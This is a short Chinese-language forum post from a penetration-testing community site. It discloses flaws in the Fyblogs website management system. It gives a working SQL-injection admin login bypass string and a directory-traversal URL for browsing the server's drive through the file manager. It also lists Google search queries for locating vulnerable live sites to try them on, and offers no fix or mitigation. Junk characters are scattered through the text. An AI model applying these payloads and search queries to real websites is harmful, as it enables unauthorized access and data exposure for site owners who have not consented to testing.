中国网络渗透测试联盟

标题: Fyblogs网站管理系统漏洞 [打印本页]

作者: admin    时间: 2013-3-7 13:07
标题: Fyblogs网站管理系统漏洞
漏洞类型: 未授权访问/权限绕过. q$ ]! }9 }7 A( N& z( t& h
$ ^5 e0 t6 i- {4 _1 ]1 ~
简要描述:7 Y/ x* R6 S: s* r

% F$ R1 K" b/ p* T* iFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!! c, v+ k9 S& a

# p! L/ O5 \# E' L$ b4 H详细说明:
8 t0 c! _5 f, o3 C- W
! y. Y0 n: Q* Q  E) ^" ?, c后台万能密码 'or'='or'
1 y& J. A2 [6 R# f后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!: o) N4 A% N  n4 x
admin/uploadfile.asp?currentFolder=/upfiles/../
3 Q$ ?: T0 W' e8 y- ~: M1 Y# G- E/ }) ^
漏洞证明:  i( C& R8 B& |
5 s" e! S! o$ e) x! S  t2 D3 \
谷歌:inurl:type.asp?id=1 新闻中心
0 o* M% n4 l1 F! A或者 :inurl:download_ok.asp?
' `+ y# l# n/ p, H5 l* W- i# u$ `, q0 d3 ]( N) p2 Y/ x& h
可以测试3 ^; j' Y6 N; D7 e3 f' N: n

9 k8 n6 ^! s( ^/ D- f
2 ]. L3 f# C# X




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2